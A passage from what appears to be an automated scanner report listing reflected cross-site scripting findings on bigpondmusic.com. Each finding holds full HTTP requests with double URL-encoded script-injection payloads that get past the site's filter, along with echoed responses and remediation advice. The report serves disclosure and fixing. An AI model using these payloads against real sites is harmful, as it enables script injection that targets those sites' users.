The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b6ce5'%3b3ca787e9e3c was submitted in the REST URL parameter 3. This input was echoed as b6ce5';3ca787e9e3c in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bphf/header/adh.htmlb6ce5'%3b3ca787e9e3c HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://bigpondmusic.com/?7c8ab"style%3d"x%3aexpression(alert(1))"27f2f63ab70=1
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: bigpondmusic.com
Proxy-Connection: Keep-Alive
Cookie: __utma=183468341.221961572.1290483697.1290483697.1290483697.1; __utmb=183468341.1.10.1290483697; __utmc=183468341; __utmz=183468341.1290483697.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3

Response

HTTP/1.1 404 Not Found
Date: Tue, 23 Nov 2010 03:07:58 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 87806


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
straglobalprd,telstrabpbigpondprd,telstrabpmusicprd=bigpondmusic.com";
   s.prop1 = 'BP';
   s.prop2='Entertainment';
   s.prop3= 'Music';
   s.channel = 'bphf';
   s.prop4 = 'header';
   s.prop5 = 'adh.htmlb6ce5';3ca787e9e3c';
   
   s.pageName=s.prop1 + ':' + s.prop3 + ':' + s.channel + ':' + s.prop4 + '-' + s.prop5;
   
   s.hier1= s.prop1+ '|' + s.prop2+ '|' + s.prop3 + '|' + s.channel + '|' + s.prop4 + '|' + s.prop5;
   s.
...[SNIP]...

2.196. http://bigpondmusic.com/bphf/header/adh.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /bphf/header/adh.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eed67%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eee34394dbaf was submitted in the REST URL parameter 3. This input was echoed as eed67"><script>alert(1)</script>ee34394dbaf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /bphf/header/adh.htmleed67%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eee34394dbaf HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://bigpondmusic.com/?7c8ab"style%3d"x%3aexpression(alert(1))"27f2f63ab70=1
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: bigpondmusic.com
Proxy-Connection: Keep-Alive
Cookie: __utma=183468341.221961572.1290483697.1290483697.1290483697.1; __utmb=183468341.1.10.1290483697; __utmc=183468341; __utmz=183468341.1290483697.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3

Response

HTTP/1.1 404 Not Found
Date: Tue, 23 Nov 2010 03:07:56 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 87986


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/bphf/header/adh.htmleed67"><script>alert(1)</script>ee34394dbaf" />
...[SNIP]...

2.197. http://bigpondmusic.com/bphf/res/js/bphf_menu.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /bphf/res/js/bphf_menu.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e9ce7%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e5240436d2f3 was submitted in the REST URL parameter 1. This input was echoed as e9ce7"><script>alert(1)</script>5240436d2f3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /bphfe9ce7%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e5240436d2f3/res/js/bphf_menu.js HTTP/1.1
Accept: */*
Referer: http://bigpondmusic.com/?7c8ab"style%3d"x%3aexpression(alert(1))"27f2f63ab70=1
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: bigpondmusic.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Tue, 23 Nov 2010 03:07:15 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: private
Expires: Tue, 23 Nov 2010 03:07:15 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 88606


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/bphfe9ce7"><script>alert(1)</script>5240436d2f3/res/js/bphf_menu.js" />
...[SNIP]...

2.198. http://bigpondmusic.com/bphf/res/js/bphf_menu.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondmusic.com
Path:   /bphf/res/js/bphf_menu.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a5936'%3b1c8e57db835 was submitted in the REST URL parameter 1. This input was echoed as a5936';1c8e57db835 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bphfa5936'%3b1c8e57db835/res/js/bphf_menu.js HTTP/1.1
Accept: */*
Referer: http://bigpondmusic.com/?7c8ab"style%3d"x%3aexpression(alert(1))"27f2f63ab70=1
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: bigpondmusic.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Tue, 23 Nov 2010 03:07:18 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: private
Expires: Tue, 23 Nov 2010 03:07:18 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 88073


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
strabpmusicdev=localhost,testing.,staging.;telstraglobalprd,telstrabpbigpondprd,telstrabpmusicprd=bigpondmusic.com";
   s.prop1 = 'BP';
   s.prop2='Entertainment';
   s.prop3= 'Music';
   s.channel = 'bphfa5936';1c8e57db835';
   s.prop4 = 'res';
   s.prop5 = 'js';
   
   s.pageName=s.prop1 + ':' + s.prop3 + ':' + s.channel + ':' + s.prop4 + '-' + s.prop5;
   
   s.hier1= s.prop1+ '|' + s.prop2+ '|' + s.prop3 + '|' + s.channel
...[SNIP]...

2.199. http://bigpondmusic.com/bphf/res/js/bphf_menu.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /bphf/res/js/bphf_menu.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1fa67%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e84ddb0ecf89 was submitted in the REST URL parameter 2. This input was echoed as 1fa67"><script>alert(1)</script>84ddb0ecf89 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /bphf/res1fa67%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e84ddb0ecf89/js/bphf_menu.js HTTP/1.1
Accept: */*
Referer: http://bigpondmusic.com/?7c8ab"style%3d"x%3aexpression(alert(1))"27f2f63ab70=1
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: bigpondmusic.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Tue, 23 Nov 2010 03:07:33 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: private
Expires: Tue, 23 Nov 2010 03:07:32 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 87938


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/bphf/res1fa67"><script>alert(1)</script>84ddb0ecf89/js/bphf_menu.js" />
...[SNIP]...

2.200. http://bigpondmusic.com/bphf/res/js/bphf_menu.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondmusic.com
Path:   /bphf/res/js/bphf_menu.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload db736'%3bb0de1f819 was submitted in the REST URL parameter 2. This input was echoed as db736';b0de1f819 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bphf/resdb736'%3bb0de1f819/js/bphf_menu.js HTTP/1.1
Accept: */*
Referer: http://bigpondmusic.com/?7c8ab"style%3d"x%3aexpression(alert(1))"27f2f63ab70=1
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: bigpondmusic.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Tue, 23 Nov 2010 03:07:35 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: private
Expires: Tue, 23 Nov 2010 03:07:35 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 88067


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
lhost,testing.,staging.;telstraglobalprd,telstrabpbigpondprd,telstrabpmusicprd=bigpondmusic.com";
   s.prop1 = 'BP';
   s.prop2='Entertainment';
   s.prop3= 'Music';
   s.channel = 'bphf';
   s.prop4 = 'resdb736';b0de1f819';
   s.prop5 = 'js';
   
   s.pageName=s.prop1 + ':' + s.prop3 + ':' + s.channel + ':' + s.prop4 + '-' + s.prop5;
   
   s.hier1= s.prop1+ '|' + s.prop2+ '|' + s.prop3 + '|' + s.channel + '|' + s.prop4 + '
...[SNIP]...

2.201. http://bigpondmusic.com/bphf/res/js/bphf_menu.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /bphf/res/js/bphf_menu.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7016f%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e331eb61f116 was submitted in the REST URL parameter 3. This input was echoed as 7016f"><script>alert(1)</script>331eb61f116 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /bphf/res/js7016f%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e331eb61f116/bphf_menu.js HTTP/1.1
Accept: */*
Referer: http://bigpondmusic.com/?7c8ab"style%3d"x%3aexpression(alert(1))"27f2f63ab70=1
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: bigpondmusic.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Tue, 23 Nov 2010 03:07:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: private
Expires: Tue, 23 Nov 2010 03:07:50 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 88087


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/bphf/res/js7016f"><script>alert(1)</script>331eb61f116/bphf_menu.js" />
...[SNIP]...

2.202. http://bigpondmusic.com/bphf/res/js/bphf_menu.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondmusic.com
Path:   /bphf/res/js/bphf_menu.js

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3bed2'%3b027f4026e56 was submitted in the REST URL parameter 3. This input was echoed as 3bed2';027f4026e56 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bphf/res/js3bed2'%3b027f4026e56/bphf_menu.js HTTP/1.1
Accept: */*
Referer: http://bigpondmusic.com/?7c8ab"style%3d"x%3aexpression(alert(1))"27f2f63ab70=1
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: bigpondmusic.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Tue, 23 Nov 2010 03:07:52 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: private
Expires: Tue, 23 Nov 2010 03:07:52 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 87865


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
ging.;telstraglobalprd,telstrabpbigpondprd,telstrabpmusicprd=bigpondmusic.com";
   s.prop1 = 'BP';
   s.prop2='Entertainment';
   s.prop3= 'Music';
   s.channel = 'bphf';
   s.prop4 = 'res';
   s.prop5 = 'js3bed2';027f4026e56';
   
   s.pageName=s.prop1 + ':' + s.prop3 + ':' + s.channel + ':' + s.prop4 + '-' + s.prop5;
   
   s.hier1= s.prop1+ '|' + s.prop2+ '|' + s.prop3 + '|' + s.channel + '|' + s.prop4 + '|' + s.prop5;
   s.
...[SNIP]...

2.203. http://bigpondmusic.com/bphf/res/js/bphf_menu.js [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /bphf/res/js/bphf_menu.js

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3d88d%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ef3fcf6d9b5f was submitted in the REST URL parameter 4. This input was echoed as 3d88d"><script>alert(1)</script>f3fcf6d9b5f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /bphf/res/js/bphf_menu.js3d88d%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ef3fcf6d9b5f HTTP/1.1
Accept: */*
Referer: http://bigpondmusic.com/?7c8ab"style%3d"x%3aexpression(alert(1))"27f2f63ab70=1
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: bigpondmusic.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Tue, 23 Nov 2010 03:08:08 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 88242


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/bphf/res/js/bphf_menu.js3d88d"><script>alert(1)</script>f3fcf6d9b5f" />
...[SNIP]...

2.204. http://bigpondmusic.com/bphf/res/js/s_code.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /bphf/res/js/s_code.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a3cc6%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e372b863b109 was submitted in the REST URL parameter 1. This input was echoed as a3cc6"><script>alert(1)</script>372b863b109 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /bphfa3cc6%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e372b863b109/res/js/s_code.js HTTP/1.1
Host: bigpondmusic.com
Proxy-Connection: keep-alive
Referer: http://bigpondmusic.com/?7c8ab%22style%3d%22x%3aexpression(alert(1))%2227f2f63ab70=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; __utmc=183468341; __utmb=183468341.1.10.1290483706

Response

HTTP/1.1 404 Not Found
Date: Tue, 23 Nov 2010 03:07:39 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: private
Expires: Tue, 23 Nov 2010 03:07:39 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 88297


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/bphfa3cc6"><script>alert(1)</script>372b863b109/res/js/s_code.js" />
...[SNIP]...

2.205. http://bigpondmusic.com/bphf/res/js/s_code.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondmusic.com
Path:   /bphf/res/js/s_code.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 91970'%3b855d056b211 was submitted in the REST URL parameter 1. This input was echoed as 91970';855d056b211 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bphf91970'%3b855d056b211/res/js/s_code.js HTTP/1.1
Host: bigpondmusic.com
Proxy-Connection: keep-alive
Referer: http://bigpondmusic.com/?7c8ab%22style%3d%22x%3aexpression(alert(1))%2227f2f63ab70=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; __utmc=183468341; __utmb=183468341.1.10.1290483706

Response

HTTP/1.1 404 Not Found
Date: Tue, 23 Nov 2010 03:07:41 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: private
Expires: Tue, 23 Nov 2010 03:07:41 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 87799


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
strabpmusicdev=localhost,testing.,staging.;telstraglobalprd,telstrabpbigpondprd,telstrabpmusicprd=bigpondmusic.com";
   s.prop1 = 'BP';
   s.prop2='Entertainment';
   s.prop3= 'Music';
   s.channel = 'bphf91970';855d056b211';
   s.prop4 = 'res';
   s.prop5 = 'js';
   
   s.pageName=s.prop1 + ':' + s.prop3 + ':' + s.channel + ':' + s.prop4 + '-' + s.prop5;
   
   s.hier1= s.prop1+ '|' + s.prop2+ '|' + s.prop3 + '|' + s.channel
...[SNIP]...

2.206. http://bigpondmusic.com/bphf/res/js/s_code.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /bphf/res/js/s_code.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b24ad%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e1740019aa35 was submitted in the REST URL parameter 2. This input was echoed as b24ad"><script>alert(1)</script>1740019aa35 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /bphf/resb24ad%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e1740019aa35/js/s_code.js HTTP/1.1
Host: bigpondmusic.com
Proxy-Connection: keep-alive
Referer: http://bigpondmusic.com/?7c8ab%22style%3d%22x%3aexpression(alert(1))%2227f2f63ab70=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
